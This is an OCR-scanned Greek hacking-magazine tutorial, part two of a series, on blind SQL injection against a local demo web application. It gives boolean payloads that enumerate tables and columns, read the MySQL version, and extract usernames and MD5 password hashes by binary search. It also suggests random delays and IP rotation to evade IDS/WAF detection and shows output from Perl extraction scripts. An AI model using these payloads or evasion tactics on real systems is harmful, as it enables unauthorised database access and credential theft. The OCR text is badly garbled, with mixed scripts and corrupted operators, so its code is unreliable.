την κατανοήσουμε καλύτερα. Εἰσαστε ἐτοιμοι; Ξεκινάμε! 


Injection point 


Εφόσον ἠταν ὁλα ἐτοιμα, ανοίξαμε ¿vav browser κι αρχίσαμε τις δοκιμές. 
Θα ἐχετε προσέξει (κι av ὀχι, σας το Лр εμεὶς ropa) бт! αλλάζοντας την 
τιµή του id, с’ ἑνα URL στην address bar, μεταφερόμαστε στο αντίστοιχο 
άρθρο ҳоріс να κάνουμε κλικ σε κἀποιο σύνδεσμο. Ἔτσι, av στο address 
bar δώσουμε кайт! τέτοιο: 


http://localhost/webapp.php?id-1 


θα μεταφερθούμε στο άρθρο µε іа = 1, το οποίο παρεμπιπτόντως 
ανήκει στο χρήστη subZraw. Ам στο id αποδἰδαµε την τιµή 2, τότε 

θα εμφανιζόταν το άρθρο του Thiseas και пає! λέγοντας. Τι θα 

γινόταν, άραγε, ам вєтацє то id ico µε 300; Оп! Τότε θα προέκυπτε 
£va µεγαλοπρεπέστατο "Page not found". Апо αυτό και μόνο, unopsi 
να αντιληφθεί каміс ὁτι ro input sanitization εἰναι (τουλάχιστον) 
προβληματικὀ. Камоміка, η τιµή rou id θα έπρεπε να ελέγχεται κι όταν 
βρίσκεται єктбс των αποδεκτών opiov να απορρίπτεται. Επιστρέφοντας 
στο θέμα µας --τις επιθέσεις blind SQL injection--, μετὰ апо αυτή τη 
διαπίστωση θα ακολουθούσε ша бокӣ της ακὀλουθης µορφής: 


http://localhost/webapp.php?id-1 AND 1-1 


Δοκιμάζοντας ro συγκεκριµένο URL, ro web application εμφανίζει то 
άρθρο rou subZraw. Αυτὸ упореї να φαίνεται παράξενο, αλλά σκεφτείτε 
TO εξἠς: To ід-1 αποτελεἰ va valid query, εφόσον υπάρχει àpOpo µε 
ауто то id. Εξάλλου, η ισότητα 1-1 εἶναι πάντα αληθής. Επομένως, 
ολόκληρο το query που στεἰλαμε (іа=1 AND 1-1) αποτιμάται ως TRUE 
και η βάση επιστρέφει ауто που της ζητήσαμε κανονικά. Εν ολἰγοις, то 
query που της στεἰλαμε δεν ἦταν FALSE και γι’ αυτό το εξυπηρέτησε 
χωρίς παράπονα. Μήπως ὁμως ro input sanitization ἐκοψε το δεύτερο 
σκέλος του query µας; Мпорєї va φτιάξαμε μόνοι µας то συγκεκριµένο 
web application και να γνωρίζουμε ὁτι δεν συμβαίνει каті τἐτοιο, αλλά 
σε ἑνα πιο ρεαλιστικὀ σενάριο δεν θα εἶχαμε ιδέα! Па να διαπιστώσουμε 
αν το input sanitization κόβει ra queries και δεν επιτρέπει την εκτέλεση 
λογικὠν πράξεων, μπορούμε να κάνουμε την εξἠς δοκιμή: 


http://localhost/webapp.php?id-1 AND 1-0 


Н σελἰδα που εμφανίζεται περιέχει το μήνυμα "Page not found". Κάπου 
εδώ, αν εἶχαμε an£évavri µας ἑναν праунатіко στὀχο θα μπορούσαμε у" 
αρχίσουμε τους πανηγυρισμούς. Το γεγονὸς оті η απάντηση της βάσης 
ἦταν αρνητική, evo γνωρίζουμε ὁτι υπάρχει άρθρο µε ід-1, συνεπάγεται 
бт! TO query µας Хбємж κόπηκε. Έτσι, η βάση ekriunos то 1-0 ως FALSE 


Επίθεση στα τυφλά! (μέρος 20) 
Αα 


(διότι εἶναι) κι εξαιτίας της λογικἠς πράξης AND αποτίµησε κι ολόκληρο 
TO query ως FALSE. Κατά συνέπεια, δεν επέστρεψε το арбро µε id-1, 
αλλά μιαν αρνητικἠ απάντηση |) 


Όπως αντιλαμβάνεστε, ra injection points δεν εἶναι πάντοτε τόσο аплої- 
ка. To δικὀ µας web application όμως αποτελεί &&ppayo αμπέλι! Ωστόσο, 
οι πιθανότητες επιτυχίας µιας προσπάθειας μπορούν να αυξηθούν, боо 
πιο кала γνωρίζουμε τη γλὠσσα SQL. Κάπου εδὠ θα διαμαρτυρηθεἰτε: 
ма, η γλὠσσα SQL δεν εἰναι ἴδια για όλες τις βάσεις! Ἔτσι εἶναι. П’ αυτὀ 
και θα πρέπει прота να μαθαίνουμε το εἶδος της βάσης δεδομένων, nou 
χρησιμοποιεὶ ο εκάστοτε server. Πριν ξεκινήσουμε τις δοκιμές, камоміка 
θα ἐπρεπε va пропүпӨєі ёха information gathering, µε σκοπὀ να амака- 
λύψουμε то SQL engine αλλά kai την ἐκδοσή του. Στη συνέχεια, θα ἐπρε- 
πε va αφιερώσουμε αρκετὀ χρόνο, ώστε va εξοικειωθούµε µε ra queries 
για τη συγκεκριμένη βάση... 


Συμβάσεις... 


Στο εξἠς --κι επειδἠ ο text editor δημιουργεὶ hyperlink σε κάθε γραμμὴ кі 
ἐχει αρχίσει va µου опа τα νεύρα-- θα αντικαταστήσουμε το прото (και 
σταθερὀ) τμήμα των αιτημάτων µας µε ёха ἄλλο string. Συγκεκριµένα, 
ολόκληρο το request "http://localhost/webapp.php?id-1" θα амаферєтаї 
σαν "web app. url". Па παράδειγμα, το ακὀλουθο request 


http://localhost/webapp.php?id-1 AND 1-1 
θα αναφἑρεται ως εξἠς: 
web app url AND 1-1 


Επίσης, για λόγους απλότητας, αφού επεξηγήσουµε τη λογική μερικών 
αιτημάτων και των αντίστοιχων queries που ενσωματώνει το καθένα, θα 
απλοποιήσουµε τις περιγραφὲς µας περαιτέρω. Та αιτἡματὰ µας θα ne- 
ριγράφονται ως ερωτήσεις προς τον server, ενώ οι πληροφορἱες που θα 
εξάγουµε κάθε фора θα δίνονται ως απαντήσεις του server, αλλά µε av- 
θρωποκεντρικὸ τρόπο. Av auró το τελευταίο σας μπέρδεψε, ξεχάστε то. 
Συνεχίστε να διαβάζετε και θα καταλάβετε τα πάντα. 


Know your enemy 


Ας камоцує μερικούς ακόµα ελέγχους. Αρχικά, θα εξετάσουμε αν εἶναι 
αποδεκτἀ κάποια queries pe то SELECT: 


http://localhost/webapp.php?id-1 AND (SELECT 1)-1 


Με ацто ro αἰτημα, εμφανίζεται πάλι το ἆρθρο rou subZraw. Yeah, 

baby! Μήπως £xoupe kai πρὀσβαση σε àAAec βάσεις; Μήπως έχουμε 
πρόσβαση και στον пімака mysgl.user; Auróc ο πίνακας υπάρχει σε κάθε 
τυπικἠ εγκατάσταση της MySQL. E, λοιπὸν, av ката το στήσιμο του web 
application εἶχαμε επιτρέψει στο script να συνδέεται στη βάση μέσω 

του χρήστη root, η βάση µας θα ἦταν тора εκτεθειμένη. Προσέξτε то 
ακόλουθο query: 


http://localhost/webapp.php?id-1 AND (SELECT 1 FROM mysql.user 
LIMIT 0,1)-1 


О χρήστης µέσω rou οποίου συνδέεται п εφαρμογἠ µας στη MySQL 
δεν ἐχει πρόσβαση στον nivaka mysgl.user. Έτσι, το παραπάνω αἴτημα 
επέστρεψε το κλασικὀ μήνυμα λάθους. 
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Το επόμενο nou θα θέλαμε να μάθουμε εἰναι ποιους πἰνακες περιέχει η 
βάση και τι στήλες περιλαμβάνει ο καθένας. Σημειώστε ὁτι υπάρχει ἑνας 
τρόπος µε πολύπλοκα queries που εξετάζει το information schema της 
βάσης, και µας επιτρέπει να πληροφορηθούμε αμέσως για τους πινάκες 
και TIG στήλες τους. Αυτἠ την TEXVIKT] χρησιμοποιούν και τα ἐτοιμα εργα- 
λεία. Ωστόσο, όταν εργαζόµαστε χειροκίνητα υπάρχει και µια απλούστερη 
προσέγγιση: Αυτή του να µαντέψουμε τα ονόματα... 


web app url AND (SELECT 1 FROM username LIMIT 0,1)-1 


Σε ελεύθερη μετάφραση, το παραπάνω query έχει ως εξἠς: Υπάρχει 
πίνακας username; Το web application απάντησε µε Page not found κι 
επομένως, εἶναι σαν ма µας απάντησε όχι”. 


Ας κάνουμε µια ακὀµα δοκιμή: 


web app url AND (SELECT 1 FROM users LIMIT 0,1)-1 


Ελεύθερη μετάφραση: Υπάρχει πίνακας users; To web application апа- 
ντησε εμφανίζοντας το ἄρθρο rou subZraw, κι αυτὀ ισοδυναμεί pe "var"! 


Па va τσεκάρουµε αν υπάρχει µια στήλη (кі ὀχι πίνακας, πλέον), 
προσφέρεται uia λίγο πιο παράξενη τεχνική: Θα χρησιμοποιήσουμε 
τη συνάρτηση concat() για va συνενώσουμε то string "1" µε то буора 
nou δοκιμάζουμε και στη συνέχεια, µε τη συνάρτηση substring(), θα 
апокофоциє τον πρῶτο χαρακτήρα. Αν αυτός παραμένει "1", τότε η 
στήλη που ψάχνουμε υπάρχει. 


web app url AND (SELECT substring(concat(1,login),1,1) FROM users 
LIMIT 0,1)-1 

Ερώτηση: Υπάρχει п στήλη login; 

Απάντηση: Όχι φίλε (εμφανίζεται ro μήνυμα "Page not found"). 


web app url AND (SELECT substring(concat(1,username),1,1) FROM 
users LIMIT 0,1)-1 

Ερώτηση: Υπάρχει στήλη username; 

Απάντηση: Βεβαίως και υπάρχει (εμφανίζεται το άρθρο rou subZraw). 


web app url AND (SELECT substring(concat(1,pass),1,1) FROM users 
LIMIT 0,1)-1 

Ερώτηση: Υπάρχει στήλη pass; 

Απάντηση: Φοβάμαι πως Ох! (εμφανίζεται το μήνυμα "Page not 
found"). 


web app url AND (SELECT substring(concat(1,password),1,1) FROM 
users LIMIT 0,1)-1 

Ερώτηση: Υπάρχει στήλη password; 

Απάντηση: Μάγος είσαι; (εμφανίζεται το άρθρο rou subZraw). 


Με τη βοήθεια της substring() εἶναι δυνατὸν να μάθουμε και την ἐκδοση 
της MySQL. Γνωρίζουμε оті о αριθµὀὸς της ἐκδοσης εἶναι της µορφἠς 
X.Y, µε 3«X«6 και 0«Y«6. Επομένως, ξεκινάμε τις ερωτήσεις µας για то 
πρὠτο фпфіо της ἐκδοσης: 


Επίθεση στα τυφλά! (μέρος 
ri 


web app url AND substring(((üversion,1,1)-4 

Ερώτηση: Είναι о πρώτος χαρακτήρας της version то 4; 
Απάντηση: Όχι (εμφανίζεται ro μήνυμα "Page not found"). 
web app url AND substring(((üversion,1,1)-5 

Ερώτηση: Είναι о πρώτος χαρακτήρας της version то 5; 
Απάντηση: Αμέ (εμφανίζεται ro ἄρθρο rou subZraw). 

web app url AND substring(((üversion,3,1)-4 

Ερώτηση: Είναι o τρίτος χαρακτήρας της version то 4; 
Απάντηση: Μπα... (Εμφανίζεται ro μήνυμα "Page not found"). 
web app url AND substring(((Qversion,3,1)-5 

Ερὠτηση: Είναι ο τρίτος χαρακτήρας της version TO 5; 
Απάντηση: Σωστά! (εμφανίζεται το άρθρο rou subZraw). 


Μετὰ апо αυτὸν τον κύκλο ερωτήσεων κι απαντήσεων, γνωρίζουμε оті 
η εγκατεστημένη ἐκδοση της MySQL εἶναι η 5.5. Ζεσταθήκατε; Тора 
αρχίζουν οι ομορφιές! Θα γνωρίσουμε ша τεχνικἠ που ονομάζεται blind 
ASCII SQL injection. 


X Blind SQL Injection example - Mozilla Firefox -+x 
File Edit View History Bookmarks Tools Help 
| E Blind SQL Injection example | + | 

<Æ | @ localhost/webapp.php?id-1 and substring(@@version,3,1)=4] v O | [El v сооо ο! 4 


Welcome {ο the deltaHacker's article archive! 


Article 1  Article2  Article3  Artidle4 Article 5 


Page not found. 


ASCII stupid question - get a stupid ANSI 


Μέχρι στιγµἠς έχουμε μάθει την ἐκδοση της βάσης δεδομένων, κάποιους 
ενδιαφέροντες πἰνακες και κάποιες ενδιαφἐρουσες στήλες. Ωστόσο, δεν 
έχουμε ακουμπήσει καθόλου τα πιο σημαντικἁ δεδομένα, nou κεἰτονται 
εντὸς των πινάκων: Τα διάφορα usernames και та passwords. Αυτά τα 
στοιχεία αποθηκεύονται сам character strings. Αυτὸ ισχύει και yia τα 
συνθηματικά, παρ’ ὁλο που αποθηκεύονται σε κρυπτογραφημένη µορφή. 
Ὅμως, τα character strings δεν μπορούν να συνδυαστούν µε τις πράξεις 
Boolean. Ti μπορούμε να κάνουμε για να συνεχίσουμε το παιχνίδι των 
ερωτήσεων µε TOV server; 


Όπως έχουμε δει, µε τη συνάρτηση substring μπορούμε να επιλέγουμε 
(και να αποκὀπτουµμε) οποιοδήποτε υποσύνολο χαρακτήρων ενὸς string. 
Ακόμα και vav μεμονωμένο χαρακτήρα. Αυτή η γνώση οδηγεὶ σε µια 
βεβιασμένη και δυστυχώς λανθασμένη ιδέα: Στη δημιουργία ερωτημάτων 
του τύπου "μήπως eivar's' ο πρῶτος χαρακτήρας rou nporou username;". 
Δυστυχώς,είναι αδύνατο να εκτελεστεί ἑνα τἐτοιο ερώτημα. Ωστόσο 
μπορούμε va μετατρέψουμε το ερώτημα σε αριθµητικὀ. Σ’ αυτή την nE- 
ρίπτωση, ro query θα λειτουργήσει κανονικἀ. Па να πετύχουμε αυτή τη 
μετατροπή, θα χρησιμοποιήσουμε τη συνάρτηση ascii() της MySQL. Н 
συγκεκριμένη συνάρτηση επιστρέφει τον κωδικὀ ASCII ενὸς χαρακτήρα 
(http://en.wikipedia.org/wiki/ASCII). Υποψιάζεστε τι έχουμε βάλει µε то 


Ερώτηση: Πείτε 
µου, κύριε server, 
μήπως n MyS QL 
εἶναι της οικογέ- 
νειας 4.Χ; 
Απάντηση: Ὀχι 
καλέ uou дубра- 
πε (εμφανίζεται 
το μήνυμα Page 
not found). Ti δεν 
καταλαβαίνεις; 
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vou µας; Αν ὀχι, δείτε βήμα προς βήμα ті πρὀκειται να κάνουμε: 


1. Oa κατασκευάσουµε ἑνα κλασσικὀ query, στο δεύτερο µέρος του 
οποίου θα γίνεται αναφορά прос ἑνα ενδιαφέρον στοιχείο (π.Χ., 
στο Username του πρῶτου χρήστη). 


2. Θα χρησιμοποιήσουμε τη συνάρτηση substring, yia va απομονώ- 
σουµε τον прото χαρακτήρα апо αυτό το ενδιαφέρον” στοιχείο. 


3. Θα χρησιμοποιήσουμε τη ascii(), για να πάρουμε rov κωδικό ASCII 
που αντιστοιχεἰ στον прото χαρακτήρα rou username. 


4. Θα συγκρίνουμε αυτόν τον κωδικό µε ἄλλους, πιθανούς κωδι- 
κούς. Όταν уаутєфоциє την τιµή αυτού του κωδικού, θα έχουμε 
μάθει ποιος εἶναι ο ASCII κωδικὸς του πρὠτου χαρακτήρα, του 
username του πρώτου χρήστη. 


5. Ἐπαναλαμβάνουμε апо το βήμα 2 και μετὰ, για τον επὀµενο xapa- 
ктпра rou username του nporou χρήστη. 


Νομίζουμε оті тора καταλάβατε τι θέλουμε να κάνουμε, ὁπως επἰσης και 
το πόσο κοπιαστικὀ εἶναι. Ας το δούμε στην πράξη: 


web app url AND ascii(substring((SELECT username FROM users LIMIT 
0,1),1,1))-114 

Ερώτηση: Έχει o πρώτος χαρακτήρας του username TOU πρώτου 
χρήστη τον ASCII κωδικό 114; Σε апла ελληνικά, μήπως πρὀκειται για 
τον χαρακτήρα "r^; 

Απάντηση: Όχι φίλε (εμφανίζεται το μήνυμα "Page not found"). 


web app url AND ascii(substring((SELECT username FROM users LIMIT 
0,1),1,1))-115 

Ερώτηση: Έχει ο πρώτος χαρακτήρας του username TOU πρώτου 
χρήστη τον ASCII κωδικό 115; Σε απλά ελληνικά, μήπως πρὀκειται yia 
τον χαρακτήρα "s^; 

Απάντηση: Μέσα ἐπεσες (εμφανίζεται το άρθρο του subZraw). 


Μόλις ανακαλύψαμε том прото χαρακτήρα rou username. Κουράστηκε 
κανεὶς; Όχι, є; Кала το καταλάβαμε! Boup στους επόμενους 
χαρακτήρες... 


Divide and conquer 


Eo πρέπει να κάνουμε ша παρένθεση και va πούμε бт! στα ερωτήματα 
µε τους κωδικούς ASCII δεν χρησιμοποιείται συνήθως ο τελεστής της 
ισότητας, αλλά ο “>” (μεγαλύτερο). Αυτό συμβαίνει γιατὶ ο πίνακας ASCII 
εἶναι διατεταγμένος (кабє χαρακτήρας μετὰ апо κάποιον алло ἐχει pE- 
γαλύτερο κωδικὀ) και γιατὶ ог χαρακτήρες των γραμμάτων εμφανίζονται 
µε αλφαβητικἠ σειρἀ. Έτσι, ο χαρακτήρας "b" έχει μεγαλύτερο κωδικὀ 
апо το χαρακτήρα "a" και πάει λέγοντας. То ἴδιο ισχύει και για τους KE- 
φαλαΐους χαρακτήρες, οι οποίοι παρεμπιπτόντως ξεκινούν αμέσως μετά 
τους πεζούς. Ас επιστρέψουµε орос ота queries µετους κωδικούς ASCII. 
Όταν μαθαίνουμε Or! ο κωδικὀς ενός χαρακτήρα εἶναι μεγαλύτερος апо 
εκεῖνον του “г”, ξέρουμε στα σίγουρα бт! o uno εξέταση χαρακτήρας δεν 
упореї va εἶναι "a", "b" , "c", "d", "e", "f", ..., "p", “а” ἡ “г”. Ως εκ τούτου, 
χρησιμοποιώντας то “>” καταφἑρνουµε va γλυτώσουμε пара πολλούς 
ελέγχους! Δείτε δύο παραδείγματα: 
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- Blind SQL Injection example - Mozilla Firefox = зх 
File Edit view History Bookmarks Tools Help 
| i Blind SQL Injection example Ї +| 

Ф | @ localhost/webapp.php?id-1 and (SELECT substring(concat(1,password).1.1) from users limito1)-3 т 9 [Ers ο 4 


Welcome to the deltaHacker's article archive! 


Artidle1 Artide2  Artide3  Artide4 Article 5 


Windows passwords 
by subzraw 


web app url AND ascii(substring((SELECT username FROM users LIMIT 
0,1),1,1))»109 


Ερώτηση: Μήπως o πρώτος χαρακτήρας του πρώτου username έχει 

μεγαλύτερο κὠδικό апо το χαρακτήρα т (109); Ουσιαστικά, µε αυτή 

την ερώτηση καταφέρνουµε να "διαιρέσουμε” τα διαθέσιµα γράμματα 
σε δύο μεγάλα τμήματα (a ἑως m και n έως 2). 

Απάντηση: Nai εἰναι (εμφανίζεται το άρθρο του subZraw). 


web app url AND ascii(substring((SELECT username FROM users LIMIT 
@,1),1,1))>116 


Ερώτηση: Μήπως о πρώτος χαρακτήρας rou πρώτου username ἐχει 
μεγαλύτερο κωδικὀ апо το χαρακτήρα "t" (116); Με ацті την ερώτηση 
χωρἱζουμε εκ νέου τους εναπομείναντες χαρακτήρες σε δύο ομάδες (n 
ἑως t kai u ἑως 2). 

Απάντηση: Όχι φίλε (εμφανίζεται το μήνυμα "Page not found"). 


Ὅπως βλέπετε, µε δύο µόνο ελέγχους έχουμε αποκλείσει σχεδὸν τα τρία 
τέταρτα των χαρακτήρων. Γνωρίζουμε πλέον бт! ο πρώτος χαρακτήρας 
του πρώτου username βρίσκεται στο διάστηµα [n...t]. Тора μπορούμε 
να συνεχίσουμε µε την ἴδια μέθοδο ἡ, ємаЛлактіка, να ελἐγξουµε 
συγκεκριμένους χαρακτήρες που εμφανίζονται µε μεγαλύτερη 
συχνότητα: 


web app url AND ascii(substring((SELECT username FROM users LIMIT 
0,1),1,1))-115 


Ερώτηση: Μήπως o πρώτος χαρακτήρας εἶναι то πολύ συχνό "s" 
(131593 
Απάντηση: Мліууко, δικἑ uou (εμφανίζεται то άρθρο rou subZraw). 


Κι ἀλλα συμπεράσματα 


Тора που μάθαμε ro колпак! HE TIG συγκρίσεις, μπορούμε να συνεχίσου- 
µε то σκάψιμο της βάσης πιο аподотіка! Έχουμε μάθει то прото γράμμα 
TOU πρώτου username και µας διακατέχει ша συγκρατημένη αισιοδοξία: 
Θα χρειαστούν ελάχιστοι ἐλεγχοι, για κᾶθε χαρακτήρα του username του 
πρώτου χρήστη. Και κάπως ¿TOI τίθεται το EENG ερώτημα: Πόσο εἶναι το 
μήκος του username του πρώτου χρήστη; Εδώ θα µας βοηθήσει η συ- 
νάρτηση char. length(): 


web app url AND (SELECT char length(username) FROM users LIMIT 
0,1)»6 


Epornon: Μήπως ro µήκος του πρὠτου username εἶναι μεγαλύτερο 
апо б; 
Απάντηση: Nai εἰναι (εμφανίζεται το ἆρθρο του subZraw). 


Ερώτηση: Μήπως 
ο πίνακας users 
έχει καμία στήλη 
HE то ὀνομα 
password; 
Απάντηση: Ma και 
βέβαια, φίλε uou 
(εμφανίζεται το ἀρ- 
θρο rou subZraw). 
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ÁNAND 


web app url AND (SELECT char length(username) FROM users LIMIT 
0,1)»7 


Ερώτηση: Μήπως το μήκος TOU πρώτου username εἶναι μεγαλύτερο 
απὀ 7; 
Απάντηση: Όχι, δεν εἰναι (εμφανίζεται το μήνυμα "Page not found"). 


Μάλιστα. Εφόσον το μήκος εἶναι μεγαλύτερο апо το 6 αλλά ὀχι και апо 
το 7, εἶναι σίγουρα ico µε 7. Ας δούμε τι γίνεται µε то password... 


web app url AND (SELECT char length(password) FROM users LIMIT 
θ,1)»8 


Ερώτηση: Μήπως το μήκος του password του πρώτου χρήστη, εἶναι 
μεγαλύτερο απὀ 8; 
Απάντηση: Nai εἰναι (εμφανίζεται το άρθρο του subZraw). 


web app url AND (SELECT char length(password) FROM users LIMIT 
0,1)»16 


Ερώτηση: Μήπως ro μήκος του password του πρώτου χρήστη, εἰναι 
µεγαλύτερο απὀ 16; 
Απάντηση: Nai εἰναι (εμφανίζεται το άρθρο του subZraw). 


Αμάν! Λίγο μεγἁλο δεν εἶναι αυτὀ ro password; Μήπως εἶναι 
αποθηκευμένο σε κάποια ειδικἠ µορφή; 


web app url AND (SELECT char length(password) FROM users LIMIT 
15153 


Ερώτηση: Μήπως ro μήκος του password του πρώτου χρήστη, εἶναι 
µεγαλύτερο απὀ 31; 
Απάντηση: Nai, εἶναι (εμφανίζεται το άρθρο rou subZraw). 


Αυτό το περιμέναμε, алла yia να δούμε ті γίνεται και µε TO 32... 


web app url AND (SELECT char length(password) FROM users LIMIT 
1,1)»32 


Ερώτηση: Μήπως то μήκος του password του πρώτου χρήστη, εἶναι 
µεγαλύτερο апо 32; 
Απάντηση: Όχι (εμφανίζεται ro μήνυμα "Page not found"). 


Аха! Apa το μήκος rou password εἶναι ακριβώς 32 χαρακτήρες. Н 
υπόθεση μυρίζει MD5 hashing (32 digits fixed length). Εάν ισχύει κάτι 
TÉTOIO, οι ερωτήσεις nou θα κάνουμε για ra password δεν χρειάζεται να 
σκανάρουν όλη την αλφαβήτα. Εάν ra password εἶναι αποθηκευμένα 
σαν MD5 hashes, арке! ма τσεκάρουµε τα δεκαέξι ψηφία των αριθμών 
στο δεκαεξαδικὀ σύστημα (апо 70" ἑως "9" και апо "a" έως “Ғ”). 
Ταυτόχρονα, για αυτούς τους ελέγχους θα μπορούμε να μετατρέπουμε 
κάθε κεφαλαίο χαρακτήρα σε πεζὀ. Εφόσον μιλάμε για αριθμούς, το 
letter case δεν παἰζει κανένα роло. Έτσι, μπορούμε va κἄνουμε τη 
δουλειά µας µε ακόμα λιγότερες δοκιμές. 


Ἔτοιμα εργαλεῖα 


Ας κάνουμε ємам μικρὸ απολογισμὀ και μερικούς ενδιαφέροντες υπολογι- 
σμούς. Па τον πρώτο user ισχύουν τα εξής: 


ο ΤΟ username ἐχει μήκος 7 χαρακτήρες και καθένας апо αυτούς 


Επίθεση στα τυφλά! (μέρος 
Αα 


μπορεί να εἶναι κάποιος апо τους 95 (printable) rou πίνακα ASCII. 
Δηλαδή, στη χειρότερη περίπτωση θα χρειαστούν 95 δοκιμὲς για 
κάθε χαρακτήρα. Па ολόκληρο ro username θα χρειαστούν 630! 


ο To password έχει μήκος 32 χαρακτήρες και καθένας апо αυτούς 
µπορεί να εἶναι οποιοσδήποτε апо та 16 ψηφία των αριθμών στο 
δεκαεξαδικὀ. Στη χειρότερη περίπτωση, θα χρειαστούν 16 δοκιμὲς 
για κάθε χαρακτήρα του MD5. Επομένως, για ολόκληρο то hash θα 
χρειαστούν σχεδὸν 512 δοκιμές! 


Αν σκέφτεστε От! όλοι αυτοί οι ἐλεγχοι θα μπορούσαν να γίνουν µε то 
χέρι κι апо то browser, εἶστε τουλάχιστον παρανοϊκοί -- µε την KaAr| єм- 
voia. Αν χρειάζονται 1142 ερωτήματα για rov прото μόνο χρήστη, OKE- 
фтєїтє поса θα χρειαστούν για όλους. Σε va ρεαλιστικὀ σενάριο, θα 
ἠταν αδύνατο να στείλουμε τόσα HTTP requests χωρὶς ма µας μπλοκάρει 
κάποιο IDS ἡ МАҒ. Όλο και κάποιο alert θα έφτανε στον admin και то 
προσωρινό ban της διεὐθυνσής нас θα ἦταν σχεδὸν αναπὀφευκτο. 


Пос θα μπορούσαμε να ξεπεράσουμε αυτὲς τις δυσκολίες; Ας ρἰξουμε 
μερικὲς ιδέες... 


ο Na ελαττώσουμε τον αριθμὸ των δοκιμών και ара το πλήθος των 
HTTP requests. 


o Ауто µπορεί να γἰνει εφαρµὀζοντας ro koAnóki nou εἶδαμε vopi- 
тєра: Διαιρώντας συνέχεια το πλήθος των διαθέσιμων χαρακτή- 
ρων σε δύο τμήματα. 


© Περιορἰζοντας το αλφάβητο! Κι auro то εἰδαμε νωρίτερα. Στην 
περίπτωση των MD5 hashes, δεν χρειάζεται να κάνουμε διάκρι- 
ση μεταξὺ πεζών και κεφαλαίων. Επίσης, μπορούμε και πάλι να 
εφαρμόσουμε το колпак! µε τις διαιρέσεις των τμημάτων ам кі 
ὀχι τόσο αποδοτικἁ, αφού та αριθµητικἁ ψηφία και τα γράμματα 
που ενδέχεται να εμφανίζονται σε ἑναν δεκαεξαδικὀ αριθμό δεν 
βρίσκονται σε διαδοχικὲς θέσεις του пімака ASCII. 


ο Να αυξήσουμε το χρόνο ανάμεσα στα HTTP requests, oore να µην 
κινήσουμε υποψίες. Αυτό µπορεἰ να γίνει εύκολα anó ἑνα script, το 
οποίο θα εισάγει µια χρονικἠ καθυστέρηση (ενδεχομένως τυχαία) 
πριν апо κάθε δοκιμή. 

e Να αλλάζουμε σε такта χρονικἁ διαστήματα τη διεύθυνση апо την 
οποία πραγματοποιούνται οι δοκιμές, WOTE και πάλι να µην κινούμε 
υποψίες. 

Φαίνεται πως για να κάνουμε τη Gor] µας ευκολότερη, εἶναι σχεδὸν ava- 
укастіко να καταφύγουµε σε διάφορα scripts. Πάμε λοιπὀν να δούµε το 
прото апо ra біка µας scripts (retrieve-v1.pl), nou βρίσκεται στο γνω- 
сто πακέτο BlindSQL.zip (http://bit.ly/dhei2BlindsQLi). Πρέπει va noù- 
με, βέβαια, ότι та σκριπτάκια µας εἶναι προσαρμοσμένα στο σενάριο των 
δοκιμών µας και στοχεύουν αυτόματα στο password του πρὠτου χρήστη. 


Y Blind SQL Injection example - Mozilla Firefox - κ 
File Edit View History Bookmarks Tools Help 
12 випа SQL Іпіесіопехатріє || |як| 


4 @ localhost/webapp.php?id--1 and ascii(substring((SELECT username from users limit 0,1),1,1))>11] | v 9 | + αἱ 4 


Welcome {ο the deltaHacker's article archive! 


Article1 Articdle2 Article3 Агіісіе4 Article 5 


Page not found. 


Ερώτηση: Μήπως 
о πρὠτος χαρακτή- 
рас του πρώτου 
username ἐχει 
μεγαλύτερο ASCII 
code апо то 115; 
Απάντηση: Μέσα 
ἐπεσες (εμφανίζε- 
ται TO арбро του 
subZraw). 
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кс ць... 


Ωστόσο, η λειτουργία τους εἶναι παραμετρικἠ кі ἐτσι µπορείτε ма µετα- 
βάλλετε τη συμπεριφορά τους. Σε κάθε περίπτωση, ріхтє µια ματιὰ στον 
кобіка του καθενὸς και εἰμαστε βέβαιοι бт! θα καταλάβετε τι πρέπει va 
κάνετε. 


alfünostromo ~/Оеѕкёор $ perl retrieve-v1.pl 

*** Blind ASCII SQLi by 41іЗп - Version 1 (Linear Search) *** 

[*] Search started at: Wed Aug 15 19:38:55 EEST 2012 

[*] Result for user 0: afc2fdb4aac65655dd99851716327778 

[*] Search ended at: Wed Aug 15 19:38:56 EEST 2012 

[*] Hits needed: 512 
Το πρῶτο script υπήρξε αποτελεσματικότατο στην αποστολἠ του. Па 
TO decryption του MD5 hash μπορούμε να χρησιμοποιήσουμε то script 
απὸ το σχετικὀ άρθρο rou Ог@С (http://deltahacker.gr/?p-6239) ἡ την 
απἰστευτα πλούσια βάση µε hashes (8,7 δισεκατομύρια), στο http:// 
md5decrypter.co.uk. Σημειώστε ὁτι τα hits που κάνει το script εἶναι 512, 
καθώς η αναζήτηση που πραγµατοποιεἰ εἶναι γραμµική!. Αν σας φαίνεται 
παράξενο то γεγονὸς оті ra 512 hits ἐγιναν στη διάρκεια ενὸς δευτερο- 
λέπτου, σκεφτείτε ότι κάνουμε τις δοκιμαστικὲς επιθέσεις апо το ἴδιο un- 
χάνημα! Σε évav live στὀχο, στο Internet, θα χρειαζόταν πολλἠ περισσὀ- 
τερη фра. Ας δούµε тора και το δεύτερο script (retrieve-v2.pl) σε δράση: 

alf@nostromo -/Desktop $ регі retrieve-v2.pl 

*** Blind ASCII SQLi by 4li3n - Version 2 (Linear Search 

Optimized) *** 

[*] Search started at: Wed Aug 15 19:39:00 EEST 2012 

[*] Result for user 0: afc2fdb4aac65655dd99851716327778 

[*] Search ended at: Wed Aug 15 19:39:01 EEST 2012 

[*] Hits needed: 251 
AUTO το script εἶναι στοιχειωδὠς εξυπνὀτερο. Όταν βρίσκει évav xapa- 
ктйра προχωρά στον επόμενο και δεν μένει στον ἰδιο, μέχρι να праүра- 
τοποιηθούν ὁλες οι πιθανὲς δοκιμές. Έτσι, ra hits μειώθηκαν ora 2512. Ас 
δούμε тора kai το τρίτο (retrieve-v3.pl): 

alfünostromo ~/Оеѕкёор $ perl retrieve-v3.pl 

*** Blind ASCII SQLi by 41i3n - Version 3 (Binary Search) *** 

[*] Search started at: Wed Aug 15 19:39:04 EEST 2012 

[*] Result for user 0: afc2fdb4a0c65650d099851716327778 

[*] Search ended at: Wed Aug 15 19:39:04 EEST 2012 

[*] Hits needed: 128 
Πολύ καλύτερα! Αυτή τη фора χρειάστηκαν uóvo 128 hits. Εδὠ χρησι- 
μοποιεῖται η μέθοδος της δυαδικἠς αναζήτησης (binary search). Ουσια- 


стіка, χρησιμοποιείται το κολπάκι pe τις διαιρέσεις που αναφέραμε марі- 
repa. Πα προφανεὶς λόγους, αυτἠ εἶναι η καλύτερη τεχνικἠ αναζήτησης! 


